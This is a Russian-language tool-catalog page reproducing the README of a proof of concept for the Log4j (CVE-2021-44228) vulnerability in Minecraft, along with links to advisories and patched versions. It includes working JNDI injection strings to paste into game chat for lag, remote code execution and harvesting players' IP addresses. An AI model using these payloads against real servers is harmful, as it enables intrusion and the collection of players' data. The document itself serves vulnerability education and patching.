Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j-PoC — Образовательный Proof of Concept для уязвимости Log4j (CVE-2021-44228) в Minecraft | Kitploit
Инструменты/GitHubGitHub/sma-das/log4j-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsma-das/log4j-poc

Log4j-PoC

Образовательный Proof of Concept для уязвимости Log4j (CVE-2021-44228) в Minecraft

Репозиторий
33 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Доказательство концепции для Log4j (CVE-2021-44228)

Отказ от ответственности

Этот проект создан только в образовательных целях.


Введение

Это доказательство концепции RCE-уязвимости log4j, адаптированное из HyCraftHD.

Вот несколько ссылок по CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Эта ошибка затрагивает почти все версии log4j2 и, возможно, log4j1. Рекомендуемая версия — 2.15.0, которая исправляет эксплойт.

Демонстрация на minecraft (которая использует log4j2)

  • Подробности о влиянии на minecraft приведены здесь: https://twitter.com/slicedlime/status/1469150993527017483
  • Статья от minecraft находится здесь: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Исправленные версии minecraft forge: https://twitter.com/gigaherz/status/1469331288368861195
  • Подробная статья от minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Исправленные версии minecraft fabric: https://twitter.com/slicedlime/status/1469192689904193537
  • Исправленные версии minecraft paper: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Исправленные версии minecraft spigot: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Исправленные версии minecraft sponge: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Лаг или отправка сериализованных данных

  • Вставьте ${jndi:ldap://127.0.0.1/e} в чат. Если на порту 389 есть открытый сокет, logj4 пытается подключиться и блокирует дальнейшую коммуникацию до истечения тайм-аута.
  • При использовании этого эксплойта из доказательства концепции в журнале консоли появится запись THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, которая представляет собой сериализованный строковый объект от ldap-сервера.

image

  • Кроме того, вредоносный ldap-сервер получает каждый IP-адрес, с которого регистрируется сообщение. Это означает, что с помощью этого эксплойта можно собирать IP-адреса игроков на сервере.

RCE

  • Вставьте ${jndi:ldap://127.0.0.1/exe} в чат. Если -Dcom.sun.jndi.ldap.object.trustURLCodebase=true установлен в true, произойдёт удалённое выполнение кода.

image

  • К счастью, современные JDK по умолчанию отключают удалённую загрузку классов. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Старые версии всё ещё могут допускать это!!
Скачать инструмент